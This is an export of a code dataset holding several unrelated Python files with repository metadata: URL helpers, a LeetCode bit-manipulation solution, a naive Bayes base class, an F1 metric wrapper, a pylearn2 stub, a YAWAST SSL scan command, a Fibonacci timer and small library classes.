def get_project_url(unique_name):
    """Return the project URL for a '<user>.<project>' unique name."""
    parts = unique_name.split('.')
    return '{}/{}'.format(get_user_url(parts[0]), parts[1])
def get_user_project_url(username, project_name):
    """Return the project URL built from its owner and project name."""
    user_url = get_user_url(username)
    return '{}/{}'.format(user_url, project_name)
def get_experiment_url(unique_name):
    """Return the experiment URL for '<user>.<project>....<id>'."""
    parts = unique_name.split('.')
    base = get_user_project_url(username=parts[0], project_name=parts[1])
    return '{}/experiments/{}'.format(base, parts[-1])
def get_experiment_health_url(unique_name):
    """Return the heartbeat endpoint URL for an experiment."""
    return '{}/_heartbeat'.format(get_experiment_url(unique_name=unique_name))
def get_experiment_group_url(unique_name):
    """Return the experiment group URL for '<user>.<project>....<id>'."""
    parts = unique_name.split('.')
    base = get_user_project_url(username=parts[0], project_name=parts[1])
    return '{}/groups/{}'.format(base, parts[-1])
def get_job_url(unique_name):
    """Return the job URL for '<user>.<project>....<id>'."""
    parts = unique_name.split('.')
    base = get_user_project_url(username=parts[0], project_name=parts[1])
    return '{}/jobs/{}'.format(base, parts[-1])
def get_job_health_url(unique_name):
    """Return the heartbeat endpoint URL for a job."""
    return '{}/_heartbeat'.format(get_job_url(unique_name=unique_name))
def get_build_url(unique_name):
    """Return the build URL for '<user>.<project>....<id>'."""
    parts = unique_name.split('.')
    base = get_user_project_url(username=parts[0], project_name=parts[1])
    return '{}/builds/{}'.format(base, parts[-1])
|
[
"[email protected]"
] | |
94c209d3d25c989f349ccd38025fa4dd3e3dbd18
|
7f35d7d1b8f203217f47a615ca8efdb5e17976db
|
/algo/second/p693_binary_number_with_alternating_bits.py
|
1c70b23a02fcb9375c33a53430168b55fc331bdc
|
[] |
no_license
|
thinkreed/lc.py
|
767dd61f4c9454f09e66e48b2974b8d049d6e448
|
ba6b2500b86489cc34852ff73ba0915e57aa0275
|
refs/heads/master
| 2020-05-16T14:49:18.261246 | 2019-07-16T23:42:12 | 2019-07-16T23:42:12 | 183,113,318 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 196 |
py
|
class Solution(object):
    def hasAlternatingBits(self, n):
        """Return True if the binary representation of n has no two equal
        adjacent bits (e.g. 0b101, 0b1010).

        :type n: int
        :rtype: bool
        """
        # XOR n with itself shifted right by one bit: when the bits
        # alternate, every neighbouring pair differs, so the result is a
        # run of all ones (e.g. 0b111). Use n >> 1 instead of n / 2: on
        # Python 3, / is true division and yields a float, which makes
        # the ^ below raise TypeError.
        mask = n ^ (n >> 1)
        # all-ones + 1 is a power of two, so mask & (mask + 1) is zero
        # exactly when mask was all ones.
        return not (mask & (mask + 1))
|
[
"[email protected]"
] | |
d3ef66b13c17f8fe1ee580b188cfbdc448362ae2
|
8a2736b2f6ff848d0296aaf64f615ffab10d657d
|
/b_NaiveBayes/Original/Basic.py
|
c43274031e68abacbf14c82fc4271fc557f866f9
|
[] |
no_license
|
amorfortune/MachineLearning
|
4d73edee44941da517f19ff0947dfcc2aab80bb1
|
1923557870002e1331306f651ad7fc7a1c1c1344
|
refs/heads/master
| 2021-01-09T06:02:56.852816 | 2017-02-03T07:22:22 | 2017-02-03T07:22:22 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,477 |
py
|
import numpy as np
from math import pi, exp
# Precomputed sqrt(2*pi) -- the Gaussian pdf normalization constant.
# (The name is slightly misleading: it is sqrt(2*pi), not sqrt(pi).)
sqrt_pi = (2 * pi) ** 0.5
class NBFunctions:
    """Static helpers for Gaussian naive Bayes likelihoods."""
    @staticmethod
    def gaussian(x, mu, sigma):
        # Normal pdf with mean mu and standard deviation sigma.
        return exp(-(x - mu) ** 2 / (2 * sigma ** 2)) / (sqrt_pi * sigma)
    @staticmethod
    def gaussian_maximum_likelihood(labelled_x, n_category, dim):
        """Fit a per-category Gaussian for feature `dim` and return one pdf
        callable per category."""
        mu = [np.sum(
            labelled_x[c][dim]) / len(labelled_x[c][dim]) for c in range(n_category)]
        # NOTE(review): this is the *variance* (mean squared deviation) but
        # it is passed to gaussian() as `sigma` (a std dev) -- confirm
        # whether a sqrt is missing here.
        sigma = [np.sum(
            (labelled_x[c][dim] - mu[c]) ** 2) / len(labelled_x[c][dim]) for c in range(n_category)]
        def func(_c):
            # Bind the category index so each returned closure is independent.
            def sub(_x):
                return NBFunctions.gaussian(_x, mu[_c], sigma[_c])
            return sub
        return [func(_c=c) for c in range(n_category)]
class NaiveBayes:
    """Skeleton base class for naive Bayes models; subclasses implement
    feed_data and _fit."""
    def __init__(self):
        # Raw training inputs and targets.
        self._x = self._y = None
        # Preprocessed data and the fitted decision function.
        self._data = self._func = None
        # Number of possible values per discrete feature.
        self._n_possibilities = None
        # Samples grouped per label, and (data, label) pairs.
        self._labelled_x = self._label_zip = None
        # Per-category counts and per-feature conditional counts.
        self._cat_counter = self._con_counter = None
        # Mappings from internal indices back to labels / feature values.
        self.label_dic = self._feat_dics = None
    def __getitem__(self, item):
        # Convenience accessor: nb["x"] returns self._x, etc.
        if isinstance(item, str):
            return getattr(self, "_" + item)
    def feed_data(self, x, y, sample_weights=None):
        """Hook: ingest training data (implemented by subclasses)."""
        pass
    def feed_sample_weights(self, sample_weights=None):
        """Hook: ingest per-sample weights (implemented by subclasses)."""
        pass
    def get_prior_probability(self, lb=1):
        # Category priors with Laplace smoothing (lb=1 -> add-one).
        return [(_c_num + lb) / (len(self._y) + lb * len(self._cat_counter))
                for _c_num in self._cat_counter]
    def fit(self, x=None, y=None, sample_weights=None, lb=1):
        """Train the model: optionally feed data first, then build _func."""
        if x is not None and y is not None:
            self.feed_data(x, y, sample_weights)
        self._func = self._fit(lb)
    def _fit(self, lb):
        """Hook: return the decision function (implemented by subclasses)."""
        pass
    def predict_one(self, x, get_raw_result=False):
        """Predict one sample; return the label, or the raw (unnormalized)
        posterior score when get_raw_result is True."""
        # Copy the input so _transfer_x cannot mutate the caller's data.
        if isinstance(x, np.ndarray):
            x = x.tolist()
        else:
            x = x[:]
        x = self._transfer_x(x)
        m_arg, m_probability = 0, 0
        # Arg-max over categories of the posterior given by _func.
        for i in range(len(self._cat_counter)):
            p = self._func(x, i)
            if p > m_probability:
                m_arg, m_probability = i, p
        if not get_raw_result:
            return self.label_dic[m_arg]
        return m_probability
    def predict(self, x, get_raw_result=False):
        return np.array([self.predict_one(xx, get_raw_result) for xx in x])
    def estimate(self, x, y):
        # Print accuracy of the model on the (x, y) set.
        y_pred = self.predict(x)
        print("Acc: {:12.6} %".format(100 * np.sum(y_pred == y) / len(y)))
    def _transfer_x(self, x):
        # Hook: transform a raw sample into the internal representation.
        return x
|
[
"[email protected]"
] | |
77f5e2718963f38e6f8d3b4f94db63d867327aac
|
fa074f02d654df1a60e5f5d6cc0e53279f352ba3
|
/Pilot3/P3B7/metrics.py
|
2e3b8e8867ce592d35fdca05cce30c73ebec6bb8
|
[
"MIT"
] |
permissive
|
samcom12/Benchmarks-3
|
2ff5b943df7a0b4f20f8cfa6a9373383a74687e5
|
a48c85a4d4d76905c3392b18e42bea4bd28c518c
|
refs/heads/master
| 2023-08-29T19:44:27.455414 | 2021-08-02T14:34:52 | 2021-08-02T14:34:52 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 867 |
py
|
from pytorch_lightning.metrics.classification import F1
class F1Meter:
    """Accumulates per-task F1 scores across batches."""
    def __init__(self, tasks, average='micro'):
        self.metrics = self._create_metrics(tasks, average)
    def _create_metrics(self, tasks, avg):
        """Create F1 metrics for each of the tasks
        Args:
            tasks: dictionary of tasks and their respective number
                of classes
            avg: either 'micro' or 'macro'
        """
        metrics = {}
        for task_name, num_classes in tasks.items():
            metrics[task_name] = F1(num_classes, average=avg)
        return metrics
    def f1(self, y_hat, y):
        """Get the batch F1 score"""
        return {
            task: self.metrics[task](pred, y[task])
            for task, pred in y_hat.items()
        }
    def compute(self):
        """Compute the F1 score over all batches"""
        totals = {}
        for task, metric in self.metrics.items():
            totals[task] = metric.compute().item()
        return totals
|
[
"[email protected]"
] | |
c026325912bbc226f2020f4804cb3964da43e858
|
4252102a1946b2ba06d3fa914891ec7f73570287
|
/pylearn2/linear/linear_transform.py
|
657282a1c1dbc8111ae74b874623568fcce31f81
|
[] |
no_license
|
lpigou/chalearn2014
|
21d487f314c4836dd1631943e20f7ab908226771
|
73b99cdbdb609fecff3cf85e500c1f1bfd589930
|
refs/heads/master
| 2020-05-17T00:08:11.764642 | 2014-09-24T14:42:00 | 2014-09-24T14:42:00 | 24,418,815 | 2 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,812 |
py
|
"""
.. todo::
WRITEME
"""
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2010-2012, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "Ian Goodfellow"
__email__ = "goodfeli@iro"
class LinearTransform(object):
    """
    A generic class describing a LinearTransform. Derived classes may implement linear
    transformation as a dense matrix multiply, a convolution, etc.
    Classes inheriting from this should also inherit from TheanoLinear's LinearTransform
    This class does not directly inherit from TheanoLinear's LinearTransform because
    most LinearTransform classes in pylearn2 will inherit from a TheanoLinear derived
    class and don't want to end up inheriting from TheanoLinear by two paths
    This class is basically just here as a placeholder to show you what extra methods you
    need to add to make a TheanoLinear LinearTransform work with pylearn2
    """
    # All methods below are abstract hooks: subclasses must override the
    # first two; set_batch_size is an optional no-op by default.
    def get_params(self):
        """
        Return a list of parameters that govern the linear transformation
        """
        raise NotImplementedError()
    def get_weights_topo(self):
        """
        Return a batch of filters, formatted topologically.
        This only really makes sense if you are working with a topological space,
        such as for a convolution operator.
        If your transformation is defined on a VectorSpace then some other class
        like a ViewConverter will need to transform your vector into a topological
        space; you are not responsible for doing so here.
        """
        raise NotImplementedError()
    def set_batch_size(self, batch_size):
        """
        Some transformers such as Conv2D have a fixed batch size.
        Use this method to change the batch size.
        """
        pass
|
[
"[email protected]"
] | |
79d7698a4437041440511147e14d336945d9fffe
|
e942cafaf64f6354e1f9ebd4a84bcf236ad93004
|
/yawast/commands/ssl.py
|
bbfe7b60ff039aab4923e020844fa135c88a4fb5
|
[
"MIT"
] |
permissive
|
Prodject/yawast
|
9a441a0576012dc5f0664cd23cfa0a803fd7a477
|
044309709cf3782de75a35f77297f2d2850d8e1c
|
refs/heads/master
| 2020-03-23T02:32:12.357082 | 2020-01-21T18:13:19 | 2020-01-21T18:13:19 | 140,978,938 | 0 | 0 |
BSD-3-Clause
| 2020-01-21T18:13:20 | 2018-07-14T21:23:05 |
Ruby
|
UTF-8
|
Python
| false | false | 1,974 |
py
|
# Copyright (c) 2013 - 2019 Adam Caudill and Contributors.
# This file is part of YAWAST which is released under the MIT license.
# See the LICENSE file or go to https://yawast.org/license/ for full license details.
import socket
from yawast.commands import utils as cutils
from yawast.scanner.cli import ssl_internal, ssl_sweet32, ssl_labs
from yawast.scanner.session import Session
from yawast.shared import utils, output
def start(session: Session):
    """Run the SSL/TLS scan for the given session.

    DNS resolution and redirect checks run first; HTTPS targets are then
    scanned with SSL Labs when possible, falling back to the internal
    SSLyze-based scanner for IP targets, non-443 ports, --internalssl, or
    SSL Labs failures.
    """
    print(f"Scanning: {session.url}")
    # make sure it resolves
    try:
        socket.gethostbyname(session.domain)
    except socket.gaierror as error:
        output.debug_exception()
        output.error(f"Fatal Error: Unable to resolve {session.domain} ({str(error)})")
        return
    # Follow/validate redirects before scanning the final target.
    try:
        cutils.check_redirect(session)
    except Exception as error:
        output.debug_exception()
        output.error(f"Unable to continue: {str(error)}")
        return
    # check to see if we are looking at an HTTPS server
    if session.url_parsed.scheme == "https":
        # Internal scanner for cases SSL Labs cannot handle (or on request).
        if (
            session.args.internalssl
            or utils.is_ip(session.domain)
            or utils.get_port(session.url) != 443
        ):
            # use SSLyze
            try:
                ssl_internal.scan(session)
            except Exception as error:
                output.error(f"Error running scan with SSLyze: {str(error)}")
        else:
            try:
                ssl_labs.scan(session)
            except Exception as error:
                # Fall back to the internal scanner when SSL Labs fails.
                output.debug_exception()
                output.error(f"Error running scan with SSL Labs: {str(error)}")
                output.norm("Switching to internal SSL scanner...")
                try:
                    ssl_internal.scan(session)
                except Exception as error:
                    output.error(f"Error running scan with SSLyze: {str(error)}")
    # Optional SWEET32 (3DES session count) check, independent of the above.
    if session.args.tdessessioncount:
        ssl_sweet32.scan(session)
|
[
"[email protected]"
] | |
042f26bfe56643c6652b56921c76c835ae78b86e
|
fcf99db2d9f58da7065369c70f81e3e7cb53356b
|
/extra/dynamic1.py
|
53d37a6922ed684b88e5d2cd97b18c2a630e82aa
|
[] |
no_license
|
manankshastri/self-d
|
b0f438e19d1eb6378093205c49eacd7ad3c53275
|
4266c27118354391cc9677e56c0f494506d390cd
|
refs/heads/master
| 2020-04-24T00:38:53.226656 | 2019-10-14T03:44:40 | 2019-10-14T03:44:40 | 171,572,278 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 253 |
py
|
import time
def fib(x):
    """Return the x-th Fibonacci number (fib(0) == 0, fib(1) == 1).

    The original implementation used naive double recursion, which is
    O(2**x) and hangs (RecursionError) for negative inputs; this iterative
    form runs in O(x) time and O(1) space.

    Args:
        x: non-negative index into the Fibonacci sequence.

    Returns:
        The x-th Fibonacci number.

    Raises:
        ValueError: if x is negative.
    """
    if x < 0:
        raise ValueError("x must be non-negative")
    a, b = 0, 1
    for _ in range(x):
        a, b = b, a + b
    return a
# Time a single fib(32) call and report the result plus elapsed wall time.
startTime = time.time()
# The labels previously contained their own ":"/trailing space on top of the
# ":" in the format string, producing doubled separators in the output
# (e.g. "Result:       :2178309"); the bare labels fix that.
print("%-14s:%d" % ("Result", fib(32)))
print("%-14s:%.4f seconds" % ("Elapsed time", time.time() - startTime))
|
[
"[email protected]"
] | |
4efa1687dadd46892464c946083720005116424d
|
888f65551bb3fe1b8e84c205796b24678669a649
|
/venv/bin/mako-render
|
e6e8f3b2ebd988dca4cd46c0956c7a2d59f20d2a
|
[] |
no_license
|
chunharrison/NBA-Predictor
|
e6514c70f2cf26d6db4c14aee225cfbd9d5984a7
|
967951ba34debee012385af63f2bf8031dee51ca
|
refs/heads/master
| 2022-05-04T22:02:03.374496 | 2019-05-15T05:55:34 | 2019-05-15T05:55:34 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 258 |
#!/Users/harrison/Documents/NBA-Predictor/venv/bin/python3.7
# -*- coding: utf-8 -*-
# Console-script shim generated by pip/setuptools for the ``mako-render``
# entry point; all real work is delegated to mako.cmd.cmdline.
import re
import sys
from mako.cmd import cmdline
if __name__ == '__main__':
    # Strip a "-script.py(w)"/".exe" suffix from argv[0] so help/usage text
    # shows the plain command name (matters mainly for Windows installs).
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(cmdline())
|
[
"[email protected]"
] | ||
f29a1716fb77131024301e47e4439bc769de638a
|
ef32b87973a8dc08ba46bf03c5601548675de649
|
/pytglib/api/types/search_messages_filter_animation.py
|
e52ba5032981ef7f5289e9d53f9ec2a0230f7cab
|
[
"MIT"
] |
permissive
|
iTeam-co/pytglib
|
1a7580f0e0c9e317fbb0de1d3259c8c4cb90e721
|
d3b52d7c74ee5d82f4c3e15e4aa8c9caa007b4b5
|
refs/heads/master
| 2022-07-26T09:17:08.622398 | 2022-07-14T11:24:22 | 2022-07-14T11:24:22 | 178,060,880 | 10 | 9 | null | null | null | null |
UTF-8
|
Python
| false | false | 559 |
py
|
from ..utils import Object
class SearchMessagesFilterAnimation(Object):
    """
    Returns only animation messages

    Attributes:
        ID (:obj:`str`): ``SearchMessagesFilterAnimation``

    No parameters required.

    Returns:
        SearchMessagesFilter

    Raises:
        :class:`telegram.Error`
    """
    # Wire-format type identifier used by the (de)serialization layer.
    ID = "searchMessagesFilterAnimation"

    def __init__(self, **kwargs):
        # The filter carries no state; any constructor arguments are ignored.
        pass

    @staticmethod
    def read(q: dict, *args) -> "SearchMessagesFilterAnimation":
        # The serialized form has no fields beyond its type tag, so
        # deserialization just produces a fresh, empty instance.
        return SearchMessagesFilterAnimation()
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.